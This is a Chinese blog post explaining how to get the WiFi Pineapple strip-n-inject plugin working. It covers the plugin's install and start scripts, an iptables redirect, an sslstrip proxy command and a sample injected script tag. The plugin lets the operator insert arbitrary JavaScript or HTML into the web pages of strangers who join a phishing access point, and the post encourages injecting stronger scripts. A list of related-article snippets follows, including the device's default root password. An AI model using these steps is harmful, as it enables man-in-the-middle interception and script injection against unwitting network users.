WIFI菠萝 strip-n-inject插件安装与使用

最新推荐文章于 2024-04-16 11:05:10 发布
最新推荐文章于 2024-04-16 11:05:10 发布
阅读量2.7k 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: WIFI菠萝 Linux 文章标签: WIFI菠萝 XSS 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_15983713/article/details/50242309
本文介绍了如何在WiFi菠萝设备上安装和使用strip-n-inject插件进行XSS攻击。通过创建指定目录、修改配置文件,成功启动插件后,可以在目标连接钓鱼WiFi时在其网页源码中注入JavaScript代码或HTML标签,实现XSS攻击。请注意合法和道德的网络安全实践。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

WIFI菠萝有一个strip-n-inject插件。可以在其他人连上钓鱼WIFI浏览网页时,在其网页源码末尾插入文字。当然包括HTML标签和Javascript代码。所以可以做到XSS攻击。


而一开始将strip-n-inject插件放到/pineapple/components/infusions/目录,打开Web页面,点Install按钮,一般是安装不成功的。


于是看了一下它的安装脚本:

/pineapple/components/infusions/strip-n-inject/includes/install.sh

#!/bin/sh

installed="0"

# install deps
opkg remove twisted-web --force-depends && opkg update && opkg install twisted-web && installed="1"

if [ ! -e "/usr/lib/python2.7/site-packages/OpenSSL" ]; then
  ln -s /sd/usr/lib/python2.7/site-packages/OpenSSL /usr/lib/python2.7/site-packages/
fi

if [ ! -e "/usr/lib/python2.7/site-packages/twisted/web" ]; then
  ln -s /sd/usr/lib/python2.7/site-packages/twisted/web /usr/lib/python2.7/site-packages/twisted/
fi

if [ "${installed}" == "1" ]; then
  touch installed
fi

从第六行可以看出,安装时卸载了twisted-web,然后又安装了一遍twisted-web。“twisted-web”是Python的一个Web应用开发框架。而WIFI菠萝也确实存在twisted-web。所以可以直接创建”installed“文件表示已安装。

# touch /pineapple/components/infusions/strip-n-inject/includes/installed


刷新网页后就显示安装好了。


不过只是点Start还是显示”Strip-N-Inject is not running...“。


原因很简单,插件运行时执行了/pineapple/components/infusions/strip-n-inject/includes/proxy/sslstrip.py脚本,并带上”/sd/tmp/proxy_inject.log“参数。显然,”/sd/tmp/“目录并不存在。


所以,我们可以创建这个目录:

# mkdir /sd/tmp


或者我们改动插件,指向”/tmp/“目录。

涉及到保存目录的文件有两个:include/data.php、include/start.sh。

include/data.php

<?php

require("/pineapple/components/infusions/strip-n-inject/handler.php");

global $directory, $rel_dir;

require($directory."includes/vars.php");

if (isset($_GET['proxylog']))
{
  if ($is_codeinject_running)
  {
    // get some info
    $log_cmd = "touch /sd/tmp/proxy_inject.log ; tail -n 50 /sd/tmp/proxy_inject.log";
    exec ($log_cmd, $output1);
    foreach($output1 as $outputline1) { echo ("$outputline1\n"); }
  }
  else
  {
    echo "Strip-N-Inject is not running...";
  }
}
?>
只要更改14行,去掉两个”/sd“。

include/start.sh 

#!/bin/bash

# setup vars
export PATH=$PATH:/sd/usr/bin:/sd/usr/sbin
attacker_ip="$(cat proxy/attacker_ip.txt)"

# set our iptables redirect
iptables -t nat -A PREROUTING ! -s "${attacker_ip}" -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
#iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

# start sslstrip/inject proxy
cd proxy
python sslstrip.py -s -k -f -w /sd/tmp/proxy_inject.log 2>&1 | at now &

exit 0
同样更改倒数第三行就可以了。


然后我们Start一下。

成功了。



然后就可以开始使用了。

点”Injection Code“,然后可以在文本框中输入要注入的内容。比如JavaScript代码:

<script>alert("哈哈哈。")</script>
很简单,就是弹出写有”哈哈哈。“的对话框。


注意”Attacker IP“填好自己IP地址。当然,如果你在WIFI菠萝的父网段中也可以不设置。然后点Start


当其他人连上钓鱼WIFI并访问HTTP网页时(HTTPS没有):


当然也可以注入HTML标签:



当然远不止这样,你可以注入更牛逼的JS脚本。


如有谬误,望加指正。

转载注明出处:http://blog.youkuaiyun.com/qq_15983713/article/details/50242309

SpringBoot启动提示JSR-330 javax.inject.Inject
Nicky's blog
03-18 3321
JSR-330 ‘javax.inject.Inject’ annotation found and supported for autowiring,最近在启动一个SpringBoot项目,多次尝试都没启动成功,我还以为是端口冲突了,然后多方查找才知道原来是一个接口误打了断点,然后导致@Autowired不能依赖注入
自己搭建Wifi Pineapple Mark V
weixin_34321753的博客
05-06 473
创业搞得自己很累,不过一切都是值得的。抽空写下文章,确实好久未更新了。 前段时间由于项目需要,所以就折腾了下wifi pineapple。时间间隔有点久,根据回忆记录下。 淘宝货:TP-Link TL-MR3020 一百来块钱 先刷openwrt 所以可以看openwrt对路由器的支持列表。 http://wiki.openwrt.org/toh/sta...
暑期开箱评测Wifi Pineapple(大菠萝
Ms08067安全实验室
07-07 1万+
文章来源|MS08067 内网安全知识星球本文作者:Mr.那人(Ms08067内网安全小组成员)前不久收到了徐焱老师的实验室礼物,定制的笔记本,定制的圆珠笔以及“黑凤梨”Pineapple...
wifipineapple插件:codeInject使用
weixin_34380948的博客
12-16 281
  如果在中间人攻击的时候, 能在用户的网页中插入任意代码, 可以说已经完成一半了   wifipineapple有个codeInject插件, 可以让连上这个网络所有设备浏览网页的时候, 在网页中插入任意html代码   但是目前我用的wifipineapple版本是MK4, 官方很久不维护这个版本的wifipineapple   使用scp把本地的codeinject传到wifipine...
wifipineapple获取用户上网信息
dianyan5615的博客
01-24 458
  ssh连接到wifipineapple: 输入连接信息:ssh root@172.16.42.1 输入密码:pineapplesareyummy   安装依赖基本环境: opkg update opkg install nan opkg install htop opkg install bash opkg install netcat opk...
wifipineapple外接网卡上网
dianyan5615的博客
01-24 678
  买了一台wifipineapplepineapple有两种版本, 第一种是3G版本,可以外接3G上网卡, 还有一种是wifi版本, 包含一个物理的网络插槽, 我买的是第二种   wifipineapple包含了一个USB接口, 所以可以通过外接USB网卡, 实现网络的桥接   通过ssh连接到wifipineapple的网络,, 登陆密码为 pineapplesareyumm...
使用Wifi pineapple菠萝派)进行Wi-Fi钓鱼攻击
dcx3291777的博客
09-04 6790
简介: WiFi Pineapple 是由国外无线安全审计公司Hak5开发并售卖的一款无线安全测试神器。 特性: 用作 Wi-Fi 中间人攻击测试平台 一整套的针对 AP 的渗透测试套件 基于 WEB 应用的管理界面 基于嵌入式 linux 系统 不定时的各种软件更新,可以自定义模块、payload 官方版本的有点小贵,如果打算购买正版,可以海淘使用转运服务运输...
html-webpack-inject-attributes-plugin:使用html-webpack-plugin向标签添加ext属性的简单而强大的方法
05-06
html-webpack-inject-attributes-plugin 添加自定义属性以注入标签 安装 npm install html - webpack - inject - attributes - plugin - D 用 请在html-webpack-plugin之后使用它,尤其是在webpack2 +中。 添加到...
rollup-plugin-postcss-inject-to-css:rollup postcss 把inline的js文件转换成以css文件的方式引入
05-05
rollup-plugin-postcss-inject-to-css rollup-plugin-postcss的 inject 模式下,把导出后组件引用的xxx.scss.js转换为xxx.css进行引入 本插件依赖 ,主要是针对组件按需加载的场景下进行的优化适配 Install npm: npm...
inject-html-webpack-plugin:将脚本标签和样式链接注入到您的html中
05-09
var InjectHtmlPlugin = require ( 'inject-html-webpack-plugin' ) module . exports = { entry : { index : "./index.js" } , module : { loaders : [ ... ] } , output : { path : './dist' ,
ember-i18n-inject:ember-i18n的常见初始值设定项注入
05-03
ember-i18n-inject插件使this.i18n可用于以下component, controller, model, route, view : component, controller, model, route, view ; 安装 git clone 此存储库 cd my-addon npm install 跑步 ember ...
WiFiPineapple-NANO-用户手册-V1.2
02-11
wifi 路由器安全 WiFiPineapple-NANO 用户手册
WiFiPineapple用户手册
02-21
WiFiPineapple用户手册,以及各种工具包大全,内含sd.sh,mk5.db,fw-nano-1.0.5.bin,fw-2.4.0.bin
tplink tl-wr703n 移植 wifipineapple
01-07
tplink tl-wr703n 移植 wifipineapple,自己亲自试验,已成功。
wifi-pineapple-war-driver:自动化您的Wifi菠萝Mk。 7 工作流程!
05-29
wifi-菠萝-战争驱动程序 自动化您的Wifi菠萝Mk。 7 工作流程! _ _ _ __ ____ _ _ __ __| |_ __(_)_ _____ _ __. ._ __ | |__ _ __ \ \ /\ / / _` | '__|____ / _` | '__| \ \ / / _ \ '__. | '_ \| '_ \| '_ \ \ V V / (_| | | |_____| (_| | | | |\ V / __/ |_ | |_) | | | | |_) | \_/\_/ \__,_|_| \__,_|_| |_| \_/ \___|_(_) | .__/|_| |
无线网络安全WiFi Pineapple初探
最新发布
蛇矛实验室
04-16 3164
总结一下上面的内容,目前WiFi Pineapple生成了Management AP和Open AP,我们的PC机连接Management AP从web界面管理wifi pineapple,而Open AP开放给所有人使用。Allow List中添加允许的客户端后,才可进行访问。WiFi Pineapple连接电源后,等待机器开机后,蓝灯开始闪烁,会生成一个Pineapple_xxxx的WiFi AP,我们使用pc连接wifi后访问http://172.16.42.1:1471进行系统设置。
WIFI pineapple使用心得
热门推荐
风起的博客
03-31 1万+
目录前记环境概述模块使用心得分享后记 前记     WiFi Pineapple 是由国外无线安全审计公司Hak5开发并售卖的一款无线安全测试神器。集合了一些功能强大的模块,基本可以还原钓鱼攻击的全过程。在学习无线安全时也是一个不错的工具,下面我们来看一下这个工具的使用吧! 环境概述     首先拿到这款菠萝派,我们需...
wifi pineapple | WiFiPineapple plus 使用之3G网卡的使用教程
call_me_yifei的专栏
11-23 2782
wifi pineapple
wifi pineapple | WiFiPineapple plus 使用之利用内部存储扩展系统ROM
call_me_yifei的专栏
11-19 2619
wifi pineapple plus 内置了32GB的eMMC存储芯片
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值